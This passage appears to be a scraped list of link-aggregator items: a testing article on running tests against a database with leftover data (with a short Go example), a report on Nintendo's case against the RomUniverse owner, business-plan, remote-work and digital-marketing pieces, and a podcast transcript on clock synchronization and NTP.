manipulating state they tend to need complete isolation to be able to run in parallel - separate database instances, separate S3 test doubles - even separate filesystems occasionally. Complete isolation is expense, hassle and more moving parts (8 SQL databases for an 8-process test suite is no fun). Tests written to assume the presence of irrelevant data are much easier to parallelise - usually it can all be done within one environment. This makes it easier to do and so much more likely to happen. When a test is failing for a reason that isn't understood the debugging method is simple: run only that test, in isolation, and narrow it down until the issue is understood. This is more difficult when the database is full of background data - you aren't starting from a "clean" state. I don't think this is an insurmountable problem - in this case, just change to running with a clean database until you can diagnose the problem. Perhaps it's worth backing up the original dataset so you can refer to it later. 
Running tests designed for "dirty" datasets with clean datasets is not a problem - it's easy to switch back to using a clean dataset. Going in the other direction is much harder. Some tests have very different preconditions - one test might require that a certain type of data is absent while other tests will add this data (or will have added it in previous runs). These types of tests are difficult to adapt but hopefully fairly rare. If they can't be reworked and really are essential they can be run against a second instance of the data store in question that is cleaned between test runs. I haven't used this technique in many places and have only use it myself for a short time. The idea for it came to me when I saw a traditional, PHP-style, hand-crafted test database that wasn't being reset between tests (but which is reset between test runs). While I'm not a fan of that approach it got me thinking. I've since tried not tearing down the database on a side project, to some success. I'm ready now to try this strategy in more places, bolstered by the knowledge that if tests are written for a dirty database it is very easy to change them to running with a clean database later (usually you don't have to do anything).
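The snippets above are Python, but the rule — assert only on data the test itself created, never on table-wide state — is language-agnostic. As a purely illustrative sketch in Go (the users table, email column, connection string, driver choice and helper below are all assumptions, not part of the article):

```go
package users_test

import (
	"database/sql"
	"fmt"
	"math/rand"
	"testing"
	"time"

	_ "github.com/lib/pq" // assumed Postgres driver; any database/sql driver works
)

// openTestDB stands in for however your suite obtains a connection; the DSN is a placeholder.
func openTestDB(t *testing.T) *sql.DB {
	t.Helper()
	db, err := sql.Open("postgres", "postgres://localhost/app_test?sslmode=disable")
	if err != nil {
		t.Fatal(err)
	}
	return db
}

func TestAddingAUser(t *testing.T) {
	t.Parallel() // safe: the test never assumes it owns the whole table

	db := openTestDB(t)
	defer db.Close()

	// Unique data instead of a clean table: rows left over from other tests or
	// previous runs are just irrelevant background data.
	email := fmt.Sprintf("user-%d-%d@example.test", time.Now().UnixNano(), rand.Int63())

	if _, err := db.Exec(`INSERT INTO users (email) VALUES ($1)`, email); err != nil {
		t.Fatal(err)
	}

	// Assert only on the row this test created, never on a table-wide COUNT(*).
	var n int
	if err := db.QueryRow(`SELECT count(*) FROM users WHERE email = $1`, email).Scan(&n); err != nil {
		t.Fatal(err)
	}
	if n != 1 {
		t.Fatalf("expected exactly one user with email %q, got %d", email, n)
	}
}
```

Because nothing here depends on the table being empty, the same test runs unchanged against a freshly truncated database, a dirty one, or a dump of production data.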
1
Despite $2.1M ruling, RomUniverse owner considers bringing back ROM site
In May, a US District Court for copyright and trademark infringement. Now, Nintendo is seeking an additional permanent injunction against Storman, who it says is considering bringing the ROM site back without "Nintendo content" and who has failed to make a $50-per-month payment toward those damages. Storman—who said in court documents that his post-RomUniverse income was derived primarily from "unemployment and food stamps"—seems unlikely to ever pay even a small chunk of the $2.1 million judgment against him. Paying a token $50 a month, an amount Nintendo says Storman "proposed and agreed to," would mean that fully covering the damages would take Storman 3,500 years, and that's without accounting for interest. Still, Nintendo is using the damages to its advantage, arguing that Storman's failure to make his first $50 monthly payment "demonstrates that Nintendo has no adequate remedy at law for Defendant’s past or future infringement and underscores the need for a permanent injunction." Meanwhile, in a recent filing with the court, Perkins Coie lawyer William Rava recounts a telephone call he had with Storman on June 3 after the court's original ruling. In that call, Rava said, "Mr. Storman stated that he was still considering what to do with RomUniverse and that if he were to bring back the website, it might have video game content and ROMs from companies other than Nintendo but would not have Nintendo content." "The Opposition does not dispute that [Storman] is considering relaunching the RomUniverse website to continue to distribute video game ROMs," Nintendo writes in a filing based on Rava's deposition. "Nor does it assert that this future use will not violate Nintendo’s intellectual property rights." Storman's statement brings up an interesting legal distinction between games developed and/or published by Nintendo and third-party games that merely run on Nintendo consoles. The ruling against Storman focused on 49 games from the former group; those titles were copyrighted and trademarked directly by Nintendo. But Nintendo has less of a legal claim on hundreds of other ROMs that run on Nintendo consoles but whose copyrights and trademarks are owned by other companies (which are responsible for protecting those rights). Even if a ROM site ignored all Nintendo-published games, though, it could still face legal trouble from Nintendo for misusing trademarked console names and imagery or for suggesting a legitimate relationship with Nintendo's console hardware that doesn't exist. The , for instance, doesn't officially include any licensed games for Nintendo consoles out of (though some copyrighted NES and SNES games are occasionally uploaded by Internet Archive users before being taken down). Nintendo initially requested a permanent injunction against "future infringement" of Nintendo's intellectual property in its original motion for summary judgment against Storman. While any future infringement would still be illegal in any case, a preemptive injunction from the court would make it much simpler for Nintendo to quickly shut down a new ROM site if Storman sets one up (as he seems to be considering). The judge denied Nintendo's original request on an injunction, saying that the monetary damages and the fact the site was already shuttered weighed against the necessary argument for "irreparable harm." Now, though, Nintendo is citing the new legal precedent of the 2020 Trademark Modernization Act in arguing for a permanent injunction. 
That act, which passed just before Nintendo first requested an injunction but was not considered at the time, establishes a new "mandatory presumption of irreparable harm" in trademark infringement that Nintendo says should point the court toward an injunction. Storman, who is representing himself in the case, has meanwhile filed his own somewhat rambling motion asking the court to reconsider the statutory damages it imposed in May. "There is no legitimate, admissible evidence that the Court can reasonable [sic] construe to cause it to believe that Plaintiff, Nintendo, sustained any actual damages whatsoever as a result of any of the Defendant’s actions or inactions," Storman writes. In its response, Nintendo argues that it has already "presented uncontroverted evidence that there were approximately 50,000 illegal downloads of infringing ROMs at the time Nintendo filed its Complaint, and that the retail price for the Nintendo Games is between $20 and $60."
1
Show HN: New lite weight tool to conduct JavaScript Interviews
Hey, please click the run button to view logs here Run and View logs
1
How to write one page business plan
Whether you are starting the next big thing with a big team or a micro business that can be operated right from the corner of your home, you do need a business plan. A business plan is an essential document for any business because it acts as a roadmap to the success of the business, and guides you at each stage to make the right decisions. Moreover, it helps you stay focused, plan things in advance and most important of all generate funding. Business plan in its true sense is a detailed document and may contain tens of pages, however, if you are a first time entrepreneur and do not want to spend too much time on creating a detailed document, you can get started with a simple one page business plan. Please, note that “one page business plan” may not exactly be just a single page and if it goes up to two or three pages, it’s still OK. This one page business plan can not be the best alternative to an actual detailed business plan in many cases. For instance,  when you are going to start fundraising, you cannot use this document. Instead, you will need a detailed business plan that covers all the aspects of business, i.e. historical data, current status and expected numbers. A one page business plan best serves the situations when you have time limit to start a business or train your sales and marketing teams to plan targeted campaigns. And yes, a one page business plan can also be considered as the first step to develop a detailed business plan. As a fact of the matter, business plans need to be updated periodically, and getting started with a one page business plan is a great way to outline the most important points and expand each section gradually. Let’s check what it takes to write a business plan and how to start developing this quick and simple business plan. There are few things which must be well researched before starting working on a business plan and here is the list: You might have a killer idea in your mind, but it may not necessarily be equally feasible for the market in reality. Make sure to spend good time researching your business idea and calculating the feasibility of the same. Market research is the most important step after verifying the feasibility of a business idea. Market research includes researching consumer behavior, trends, competition, market saturation, etc. This research enables you to come up with the best offers and gain a competitive edge. It’s very important to conduct a quick research on yourself to identify your own strengths and weaknesses. It will help you identify things that you can do yourself and things that will require help from someone else. Depending on your findings you might want to have a co-founder or a partner onboard or consider outsourcing some tasks. Once you have done this research, developing a simple one page business plan will be a quick and easy affair. With all the data from your research, all you need to do is to put a summary of this data into following sections. A quick note about what you want to do with this business idea and where you want it to be at the end of the year 1, 2, and up to 5 or 10? You might want to expand your business gradually or aggressively or else you may have plans to build a profitable venture and then sell it out. Summarize all these details into a single paragraph. It’s a single sentence that captures your company’s purpose; a catchy slogan that can enhance the brand value. Here are some really great examples of best mission statements for your inspiration. Objectives are the short term goals, i.e. 
number of users you should acquire in the first, second, third and last quarter of the year, expected quarterly sales & profits, % of market share etc. A quick list of strategies you will be using to achieve the objectives listed above. For instance if you are starting a bakery business, you need to list the following points. Describe how you plan to execute the processes, i.e. when to buy materials, how much to stock, when to restock, how many products to be made, and when and how to transport the goods. The strategic plan for each business will differ, i.e. the strategies that may work for a cleaning business might not be equally effective for a photography business or a real estate business. This section requires careful consideration and you need to list the following: Action plan in the one page business plan should be a simple table of tasks with approximate deadlines, responsible person, and status. This is how a simple one page business plan looks like. One Page Business Plan Template Still not sure how to start developing a quick one page business plan for your new business? We have created a ready to use template of one page business plan to make it even easier for you. One page business plan or a simple business plan consisting of a couple of pages cannot cover all the details of your business, and so may not answer a lot of benchmarking concerns, but it is a great way to get started and you can always develop a detailed business plan out of this simple one page business plan on a later stage.
1
A Verbal Processor's Guide to Working from Home
Article summary Set up a daily team sync, and dedicate part of the meeting to chit-chat. Take a walk and call someone — anyone! Have lunch with a co-worker — virtually. Last March, I found out (like many people) that I’d be transitioning to working from home. As a fairly new employee at Atomic, with only five months under my belt, I didn’t know how to feel about the change. But within a week at home, I was loving it. Endless time with my dog, cozy pajama bottoms, and the ease of tossing in a load of laundry whenever I wanted — what was this beautiful new life?! Now, eight months into working from home, I still do enjoy spending time with my dog (even when he barks during a Zoom call). I still occasionally throw a load of laundry in the washer. And don’t get me started on the loungewear. But emotionally, there’s a gap. You see, I’m a verbal processor in the truest sense of the phrase. When a thought pops into my head, I can’t quite make sense of it until I’m talking it out with someone. So I’ve put together a few tips for my fellow verbal processors to help us get through the rest of this pandemic (however long it may be). Social connections are few and far between these days, and the format of Zoom doesn’t leave much space for casual conversations. On my team of three, we’ve started meeting every morning for a thirty-minute sync to kick off the day. The format typically goes like this: This time is loosely reserved for chit chat. We don’t even think about work during these ten minutes. We talk about things like dogs, our latest cooking adventures, and the deer that keep eating Elaine’s bushes (those darn deer!). To add a little structure to our sync, we each report in about our work using this format: These thirty minutes set the tone for my day. They make me feel connected, socially and professionally, and they offer a space to talk about whatever comes to mind. As bored as I get looking at the same four walls every day, I struggle to motivate myself to get outside. Lucky for me, my dog has no trouble wanting to go outside. So while I’m walking him, I call the one person that I know will always be down to chat — my mom. We talk about our work and our personal lives, and (as a fellow marketer) she helps me brainstorm when things feel blocked. You may not want to call your mom in the middle of the day (I get that), but maybe you have a verbal-processing friend who could use a headspace break, too. Not only will you feel more connected to your network of friends and family, but allowing yourself to have conversations that aren’t so heavy (let it be known, heavy topics include COVID-19) will allow your brain to open up creatively. To hold yourself accountable, put a fifteen- or thirty-minute hold on your calendar each day for your walk time, and stick to it. At Atomic, we have a little program called a Pair Lunch, where the company pays for Atoms to have one-on-one lunches together (with the caveat that each pair of employees only gets one paid Pair Lunch per month). This system is nice because it gives you a chance to chat with people you might not otherwise interact with much. When COVID hit, Pair Lunches didn’t really fit within the “stay at home” protocol, so Atomic implemented Virtual Pair Lunches! Each Atom is now paid for their lunch break when it’s taken during a Pair Lunch. I like to take advantage of Pair Lunches to meet with everyone — folks in my office, folks in our Grand Rapids office, anyone! 
Taking thirty minutes to sit down, eat my lunch, and have a casual conversation with a colleague has been invaluable. It makes me feel connected and brings back a sliver of the social energy I once got from daily in-person interactions. A few Atoms have even gotten creative with their Pair Lunches, doing things like ordering takeout, cooking their lunches live on camera, or, in lieu of eating, ironing their clothes to keep their hands busy. If you’re a verbal processor who’s working from home, what do you do? Please share your experiences in the comments below!
1
Digital marketers share what’s next in the ad space in 2021
Anyone who’s involved in digital marketing knows this: getting your ads out there is one thing, but actually connecting with your audience in an authentic way can be another. Curious to learn more? We got 7 seasoned marketers to share their perspectives and ideas for what’s to come in 2021 in the ad space. Digital marketing has never been more in than it is right now. All the brands are adopting it, and for obvious reasons: it produces results. The only issue is that millions of other people are fighting for the same attention as you are. The harsh truth? Banking on the same ad strategies you’ve done for the last few years isn’t going to cut it anymore. As your approach needs to change in 2021, we sat down with some seasoned digital marketing specialists from leading brands like Cosette Media, Square, Amazon, and more, to learn what exactly is going to work this year, and why. Let’s dive in! Many marketers haven’t truly understood or just have conveniently overlooked the eventual phasing out of the third-party cookie. Safari and Firefox browsers have already reduced cross-site tracking ability by limiting the cookies and Chrome is to follow suit, leaving us in an unsweetened, ‘cookie-less’ world soon. Not to forget the iOS14 debacle that’s bringing in many restrictions into the world of advertising and has left majority advertisers and publishers uncomfortable to say the least. Third party cookies, mainly from a digital advertising perspective, have been crucial as they provide the ammunition to serve personalized ads, retargeting and enabling advertisers to conduct detailed analysis. In 2021, brands and marketers together will need to revisit their audience strategies to focus more on how they can best pivot towards leveraging and developing their first-party data. Whether that is developing a robust email marketing system or a lead generation campaign or something totally revolutionary, brands in 2021 will need to leverage tactics where they can collect information about their consumers first-hand. Due to the pandemic, we’ve not only seen a dramatic uptick in the social media user base but also the engagement. Social platforms will continue to prove to be an effective avenue for brands to connect with consumers, more than ever, as in-person customer experiences are heavily impacted in the wake of this global pandemic. Platforms like Facebook are progressing to be almost like a one-stop-shop that can help brands to effectively tell their story, mission and touch user’s lives through their social media presence and deliver true engagement. Social commerce, particularly, would also continue to grow as it provides a seamless path to purchase from prospecting to conversion. It will be crucial for marketers to adapt to these new avenues that not only help potential customers discover the product/service, deliver innovative online experiences, but also drive purchases without having to leave the platform! Today’s marketing efforts are following the consumer demand to move away from superficial and sales-focused content to a more purposeful, value-driven approach. Brands are therefore searching for effective ways to connect and share their message with their target audiences without sounding salesy. This is exactly what influencers enable brands to achieve. In 2021, brands will likely invest in long-term relationships with genuine influencers versus one-off campaigns to together develop a valuable, loyal consumer base. 
It’s interesting to see how brands have always attested to content’s credibility but now the content creators will bring credibility to the brands. Influencer marketing is also overcoming one of the main issues it has been facing – trackability. As the investment in influencer marketing grows, platforms like Facebook are continuing to build measurement tools for these campaigns which will only become more robust in time to come. As consumers, we’re loyal to brands that take our feedback constructively or act upon our recommendations. When we talk about personalization, what we truly are seeking from brands is the feeling of being ‘heard’ or ‘recognized’. Interactive ads are one of the ways that brands can implement personalization and develop a more valuable and personal connection with their target audience. When I’ve personally experimented with messenger bots or experiential display ads, it has almost always resulted in better engagement which in turn has resulted in an impressive ROAS as well. Not to forget, interactive ad formats such as videos or Instant Experience ads on Facebook or Instagram also help in developing a retargeting pool based on users who engage with them which later can be re-targeted with relevant ads. This is an excellent use case for leveraging interactive ad formats, especially at a time when the cookie is diminishing and retargeting opportunities are narrowed. Interactive ads not only help in effective performance but also aid in telling a story, creating a lasting impression and heightening brand recall. Not to forget, when users interact with polls, for example, this also serves as a thermometer for the brands to gauge user preferences which can further help brands to develop certain products or pivot their marketing strategy. Digital marketing is becoming increasingly about community building and authentic engagement. Last year, brands had to look for ways to exhibit more warmth and compassion in response to the challenges customers faced relating to the pandemic, economic downturn, and social unrest. This is going to continue in 2021. Customers are using their spending as a way to reflect their sense of self-identity, so brands have to show that they align with customer values and concerns. I think we’re also going to see more innovation and creativity when it comes to digital campaigns. People are tired of the same old podcast and webinar formats. The most successful marketers will be those who can figure out how to push boundaries and excite their audience with new, interactive virtual experiences. A lot of ads in 2020 leveraged nostalgia to evoke a sense of comfort and warmth in audiences, such as Airbnb’s collaborative campaign with Blockbuster and the Fresh Prince of Bel-Air. In a scenario where budget could be limited, brands need to start conversations with consumers who are looking for real connection and trustworthy information, so I think earned media will take an important role in this case. I’m not just thinking about blogs, but also about platforms like Live Events that became popular during the quarantine. With regards to paid channels, the must-haves (Facebook, Instagram, Google, YouTube) will always be there, while, among “newer” channels, I found TikTok particularly promising as it grew +75% in 2020. Still, I’d recommend brands test this channel only if their target is actually there. In a nutshell, I think ad creatives in 2021 will be about authenticity. 
Today, consumers want it all: quality, a flawless and tailored experience, value orientation, price, newness. It won’t be enough to simply say “just do it”. So the four principles that will guide me to create relevant ads in 2021 will be: Video is obviously the front that most brands are going to be fighting for. No matter what it’s for –  webinar, classes, course, virtual events, social, or more. I think that there are still gaps for brands to explore in other forms of video. Short-form video is about to see a big rise in popularity with TikTok, Reels, and Facebook taking off. Also, live videos on Facebook and LinkedIn will continue to soar, helping B2B companies stand out from their competitors. What not to do in 2021? I think clickbait has all but died its death. If you’re employing clickbait headlines in your work, chances are, you’re doing this because you want a high number of page views. Unfortunately, this is an incorrect way to measure success. The Internet has allowed untruthful materials to spread and, as a result, this has led to a crackdown on clickbait. Since social media giants like Facebook have announced changes to its algorithms to combat this type of content, consequently, those marketers continuing to use clickbait tactics might be penalized by social media networks in the future. I think this year will be more about personalized marketing and offering an improved user experience (UX) by serving relevant content, or targeting key messages in the funnel, based on your customer’s behavior. So I think marketers will focus a lot more on retargeting ads. As customers communicate through diverse digital marketing channels, especially now people are leading an enhanced digital lifestyle, marketers feel more driven to connect them across all the channels customers frequent the most. Following some basic ground rules has always worked for me. I normally follow things like: Social media and community-building will increase their importance and creative content marketing continues to thrive and further diversify (mostly in the form of live, video, and audio). Businesses should focus on building a strong funnel, improve every step consistently and implement rapid experimentation processes to optimize marketing campaigns and overall business performance. With an increasingly quick rate of innovation, it’s important to not only focus on new tactics, but always follow a solid strategy covering the core pillars. It’s going to be interesting how digital marketing might change due to the iOS 14 update. Having a good ad strategy is key to refine your targeting and find the most profitable audiences. This is now severely threatened. At the same time, ads will become more entertaining, awake more emotions, and get you on the edge of your seat. The rationale is to capture and keep attention in a world that’s busier and buzzier than ever before. Finding your ideal target audience and addressing them in the right tone of voice and in the right channels is more important (and at the same time more complex) than ever before. People want businesses that reflect their values. Amidst the pandemic, there was a renewed global Black Lives Movement addressing racial injustice. For many consumers and brands, 2020 served as a necessary interruption to ‘business as usual’ and a wake-up call for those who hadn’t been paying attention. Unprecedently, we began to see concentrated strategies for connecting with Black communities were now on the agenda. 
In 2021, I believe that we will see that the groundwork that was laid in 2020 will come to fruition. We’ve already started to see some of those pivots such as Netflix’s dedicated category to Black filmmakers, or banks that now have specific customer strategies for Black communities to personalize their marketing efforts. Customers have been holding companies accountable for the commitments they make, and continue to drive a responsive and conscious approach to business. There are many different strategies and various technological solutions to go to market with personalized ads. However, before that, I believe we need to take a step back and ensure that the right people are employed at your company. The first step to creating more personalized and relevant ads is ensuring that brands themselves have the right people around their table. Employing and supporting Black employees and others from marginalized backgrounds is foundationally necessary to producing authentic content and marketing strategies in a country as diverse as Canada. With the underrepresentation of Black people in marketing and racialized people more generally in positions of leadership, there are a number of great organizations working to close the gaps like POCAM and Icon Talent Partners. The quest for digital marketers in 2021 subsists in the subtle art of maintaining relevance, targeted penetration, and frequency as factors for reconnection. Today, the influence to purchase is heavily diluted by a frenzy of pandemic reactivity in the over-production of content with numbing sameness. What will work? Entertainment. Video content has largely replaced all “Through The Line Marketing” (TTL) strategies. This is a huge opportunity for Ad Tech to answer to brand propositions seeking to entertain. Dynamic video innovations which seek to deliver entertainment in captivating content will generate product sales. What won’t work? Copy-cat campaigns which are unlikely to achieve growth. Our FMCG strategy will be focused on dynamic video ads designed for audience content creation, tackling influence, participation, identity, and incentive to purchase. It doesn’t get more personal than self-involvement with the brand world. Your digital marketing is no longer as simple as blasting out ads to everyone and calling it a day. Millions of other marketers are competing for their audience’s attention, devising strategies and tactics that will impact your ability to stand out. In 2021, don’t fall behind repeating the same ad strategies that worked in the past few years. Instead, break ground with contextual content, be tactical about privacy issues, and engage with the community in an authentic way to actually drive results. If you’d like to read similar pieces, we’re delivering the same level of quality insights from top industry leaders right into your inbox once a month. Let’s connect!  💌
69
Clock Synchronization (2020)
Clock synchronization, keeping all of the clocks on your network set to the “correct” time, sounds straightforward: our smartphones sure don’t seem to have trouble with it. Next, keep them all accurate to within 100 microseconds, and prove that you did -- now things start to get tricky. In this episode, Ron talks with Chris Perl, a systems engineer at Jane Street, about the fundamental difficulty of solving this problem at scale and how we solved it. Welcome to Signals And Threads, in-depth conversations about every layer of the tech stack from Jane Street. I’m Ron Minsky. Today we’re going to talk about a deceptively simple topic: clock synchronization. I think there’s nothing like trying to write computer programs to manipulate time to convince you that time is an incredibly complicated thing, and it’s complicated in like 16 different ways, from time zones to leap seconds to all sorts of other crazy things, but one of the really interesting corners of this world is how do you get all of the clocks on your big computer network to roughly agree with each other? In other words, clock synchronization. So we’re going to talk about that with Chris Perl, who’s a sysadmin who’s worked at Jane Street since 2012. Chris is better than anyone I have ever worked with at diving into the horrible details of complex systems and understanding how they work and how they can be made to work better, and he’s done a lot of work here, specifically on clock synchronization, and has, in the course of that, redone our entire system for doing clock synchronization, so he’s had an opportunity to really learn a lot about the topic. Chris, to get started, can you give us just a quick overview of how computer clocks work in the first place? So, I guess the rough gist is something like you have some oscillator, a little crystal effectively that’s inside the computer that is oscillating at some frequency, and that’s driving an interrupt that the operating system is going to handle at some level – there’s probably lots of details here that I’m just skipping over – but that’s driving an interrupt that’s going to happen in the operating system. And the operating system is using that to derive its notion of time, and so if you have a really high-quality oscillator, and those timer interrupts happen at the right rate so that you’re tracking real time, that might just happen, and if your oscillator’s very good and very stable you could actually just be pretty close to the correct time just by virtue of that. But the truth is that most computers come with fairly bad oscillators and they change their frequencies for various reasons like heat, so if you are using your computer to compile the Linux kernel or something like that, that could change the heat profile, change the frequency of the oscillator, and actually change how well you’re doing at keeping real time. When we naively think of clock synchronization as people, we think of it as like, “I’m going to go set my clock.” I’m going to look at what time it is and adjust my clock to match whatever real time is, but you’re actually talking about a different thing here. You’re talking not just about setting what the right time is right now but keeping that time correct, essentially keeping the rate at which time is going forward in sync. Correct. You’d love it if you could get like a really, really high-quality oscillator for super cheap in all your computers and then you wouldn’t need a lot of adjustment to get them to keep the correct time, but that would be really expensive. 
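As a back-of-the-envelope illustration of how oscillator error turns into wall-clock drift (the value below is purely illustrative; the specific parts-per-million figures come up in the next exchange), a constant frequency error of f parts per million accumulates f microseconds of error every second:

# Rough sketch with illustrative numbers, not figures from the conversation.
ppm = 50                          # frequency error of 50 ppm, i.e. 50 microseconds per second
seconds_per_day = 24 * 60 * 60    # 86,400
drift_seconds_per_day = ppm * 1e-6 * seconds_per_day
print(f"{drift_seconds_per_day:.2f} seconds of drift per day")  # ~4.32 s/day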
You can buy such things, they just cost a lot of money. So, you say that heat and various other things that are going on in the computer will cause this rate at which time is appearing to march forward inside of your computer to drift around. How accurate are these? Can give me a kind of numerical sense of how far these things drift away? The stuff that we run, we capture some of these statistics, we see machines that have a frequency correction applied to them of, say, 50 parts per million, which is like microseconds per second, so that works out to roughly a couple seconds per day, is how you would wind up drifting off. But I’m sure that if you had a super old desktop under your desk, that you stole from your parents or something and you were trying to rebuild into a Linux box, you might have worse numbers than that. Like a sort of relatively current generation server from a well-known vendor, you’re talking somewhere around 50 to 100 microseconds per second that they can sort of walk-off out of alignment. Okay, so clock synchronization is the process of trying to get all of those clocks that you have across your whole data center and across multiple data centers to be in sync with each other. Is that the right way of thinking about it? I think so. “In sync”, is an interesting sort of thing to say, right? You kind of would like that if you were able to instantaneously ask two random servers on your network, what time it was at the same exact point in time, if you could somehow magically do that, that they would agree to some relatively small margin of error, and I think that that’s kind of what we mean by clock synchronization. That if you could somehow magically freeze time and go ask every single computer on your network, “Hey. What time do you think it is?” that they would all roughly agree to within some error bound that you can define. Right. And this basic model actually assumes that there is a well-defined notion of what it means to be instantaneously at the same time, which isn’t exactly true because of relativity and stuff like that, but we’re going to mostly ignore that. So, I guess one property that you’re highlighting here is having the clocks agree with each other, and that’s part of it, but there’s another piece, right, which is having the clocks agree with some external reference. There’s some notion of like, what does the world think the time is? So, where does that external reference come from? I’m not an expert on this stuff, but I’ll give you the sort of 10,000-foot view. You have various physics laboratories all over the world, like NPL in the UK, and other places across the world. They all have measurements of what they think time is, using things like hydrogen masers and sort of very accurate atomic methods. They contribute all of that stuff to a single source who kind of averages it, or does some sort of weighting, to come up with what the correct time is, and then you kind of magic that over to the Air Force, who then sends it up to the GPS constellation. And GPS has a mechanism for getting time from the GPS satellites down to GPS receivers, and so if you’re a person who runs a computer network and you’re interested in synchronizing your clocks to a relatively high degree of accuracy with something like UTC, which is effectively Greenwich Mean Time, it is just sort of the current time without time zones applied. 
If you’re interested in doing that, what you can do is you can just go out to a vendor and you can buy a thing called a GPS appliance, which can hook up to a little antenna that goes onto the roof. It can receive this signal from the GPS constellation and basically gives you out time, and the accuracy there is something like maybe 100 nanoseconds or so. So you’ve got the sort of atomic measurements being fed up to a GPS constellation, down to GPS receivers that you, as an operator of a computer network, can buy. And for the purposes of this conversation, we’re going to treat those GPS receivers as the received wisdom as to what time it is, and our job is to figure out how, inside of a computer network, you make all of the different devices agree with each other and agree with that external reference. Why is it important? What does having synchronized clocks help you do? If you put yourself in the shoes of a financial regulatory authority, and you have all these different participants out there doing stuff with computer systems, and something weird happens, and you’d like to come up with a total ordering of events of what led to this crazy thing – or what led to this good thing, who knows – but you want to have a total ordering of events. If people don’t have good clock synchronization, to some external source, you can’t compare the timestamp from participant A to the timestamp from participant B, so if you were to decree everybody must have time that is within some error bound, you know if these timestamps are within that error bound, well, then I can’t be sure about the ordering, but if they’re farther away than that then I can be sure about the ordering. I can know which one came first and which one came second, and that can be very useful. So that’s the motivation that’s very specific to our industry, but don’t people in other industries care a lot about clock synchronization, too? I would have thought that there are other reasons that would drive you to want to synchronize the machines on the network. Oh, sure. There’s lots of different things. I mean, just like a general sysadmin topic, a lot of times you want to gather logs from all the systems on your computer network, and you want to analyze them for various reasons. Maybe it’s because you’re concerned about intruders. Or maybe it’s because you’re just trying to understand the way things are functioning, and if your clocks aren’t synchronized it’s very hard to kind of understand things that might have happened on system B and how they relate to system A because the two timestamps are just not – you just can’t compare them if they’re not synchronized. And I suppose there are also some distributed systems, algorithmic reasons to want clocks. Certainly, some kinds of distributed algorithms end up using clocks as ways of breaking ties between systems, and so that requires at least some reasonable level of synchronization. For sure. There’s also other network protocols that are widely used that require clock synchronization, but much less precise levels of clock synchronization. Kerberos is a widely used authentication protocol, and that requires that the clocks be synchronized to within five minutes, and the idea there is to thwart replay attacks, and stuff like that, making sure that somebody can’t obtain your credentials from a couple days ago and use them again, that kind of thing. So there, it’s like the error bars are very wide but there’s still some sort of synchronization necessary. Right. 
And I guess that’s a general theme when thinking about synchronization: different applications require different levels of synchronization, but more closely synchronized never hurts. There’s definitely tradeoffs as you start to get into the lower bounds, but yeah. If they were all free, sure, I’d like to have them exactly the same. How do people normally approach this problem of clock synchronization? What are the standard tools out there? Most people, you just kind of run whatever your distribution shipped as an NTP daemon. NTP stands for the Network Time Protocol, and it is a protocol that up until not that long ago, I just kind of assumed used some kind of magic, and it knows how to talk to some servers on the Internet or some local servers that you probably then having talking to servers on the Internet, and it synchronizes your clocks with those servers. It exchanges some packets, maybe it takes a little while, maybe a few minutes, maybe longer. You probably don’t understand exactly why, but eventually, your clocks are relatively in sync to within maybe tens, or so, of milliseconds. Can you give us a tour of how NTP actually works? Like I said, for a long time, I just kind of assumed it was magic and didn’t really think too hard about it, and then at some point, I got tasked, within Jane Street, to actually look at some of this stuff and try and meet some requirements that were a little bit harder than the sort of standard tens of milliseconds synchronization. So I actually went and just was like, “Okay. Well. How does NTP do this from first principles?” right? Like, let’s go read some of the papers from David Mills. Let’s just go see if we can actually reason this out ourselves. At the end of the day, it’s just four timestamps. There’s a lot more complicated stuff around it, but the sort of core of it is these four timestamps. Let’s say I’m the client, and you’re the server. First, I send you a packet, but before I do I write down a timestamp. When you receive that packet, you write down a timestamp. Then, you send me a reply, and before you do you write down a timestamp. Finally, when I receive that reply, I write down a timestamp. It may not seem that groundbreaking, but with just those four timestamps I can compute two important numbers, the offset, and the delay. The offset is how far my clock is off from yours, so if you think it’s 12 pm and I think it’s 12:05 pm then the offset would be five minutes. The delay is how long it took those packets to traverse the network. To compute those numbers you basically take a system of equations, and for me, an important aspect was actually writing down, with a piece of paper and a pencil, and solving these equations myself, was understanding that there’s a sort of huge assumption in this protocol, that the delay for that first packet, where I timestamped then you did, and the delay for the second packet, where you timestamped and then I did, the assumption is that those times are the same and if they’re not the same they introduce what’s called error, and that is a sort of very important aspect. That is an assumption that is made so that you can actually solve those equations to get the offset and the delay. Can you maybe explain what it is about the calculation that depends on the symmetry between the send time and the received time? Those delays are kind of what tie it together, right? 
You know that if the clocks were in sync you know that the timestamp that you took minus the timestamp that I took should be equal to the delay of the packet to get to you, right? And vice versa. My timestamp, from the second one that I received, minus your timestamp should be equal to the delay that it took for the packet to get from you to me. And you’re like, “Well. What do I do with this information?” And you say, “What if I just assume that those two delays are equal?” and if I assume that those two delays are equal, then I can start rearranging the various pieces of the equation. And then that’s how you can actually solve for the delay and the offset. What’s the role of the two timestamps on the server-side? So, if you ask me what time it is, I write down when I receive it, and then I write down the time where I send it back. You could imagine a simpler protocol with just three timestamps. Then you just assume that that time that I wrote down happened in the middle of that interval, the interval between the time you sent the first message and received the second message. How do you know when in the middle is, right? There’s lots of vagaries that happen with operating systems, so if you timestamp it on either end, as soon as you receive the packet you timestamp it, and then maybe you have to do some work, and then right before you send it back you timestamp it, and that’s sort of how you get closest to those differences I mentioned representing the actual network delay from one to the other. And I guess an extra assumption that you’re making here is that in that period between the first timestamp and the second timestamp you had better assume that the rate at which the clock is going forward is about right. I think that throws another error term into the equation. It’s, I think, typically extremely small, right? It certainly seems like something you can, in practice, ignore, because if you just look at the number of parts per million, or whatever, that you were talking about, in terms of how much drift there is in a real computer clock, I think that is, in fact, pretty tiny. Right, well you’ve got the correction being applied by the time daemon that’s running on the computer, which is keeping the clock in sync. Presumably, the server-side of this communication is also taking time from somewhere, either a reference clock or some sort of higher upstream stratum in NTP, like clocks that are better than it, something like a GPS receiver, and it has applied a sort of correction to the operating system to say, “Hey, I currently believe that the frequency is off by this much. Please correct that when you hand me back time.” So, I feel like your biggest – I guess to your point of being able to ignore in practice – your biggest concern would be if in between those two timestamps something massive changed, like the temperature rose or dropped by many, many degrees or something, such that that frequency correction was now just wildly incorrect. Okay, so we have now a network protocol. Put a timestamp, send a message, another timestamp, another timestamp, you get it back. Now the computer that started all this has some estimate for how much its clock is off. What does it do then? In the simple world, you could just set your time. You could just sort of say like, “And the time should be X,” but that’s not generally how most Network Time Protocol daemons work. 
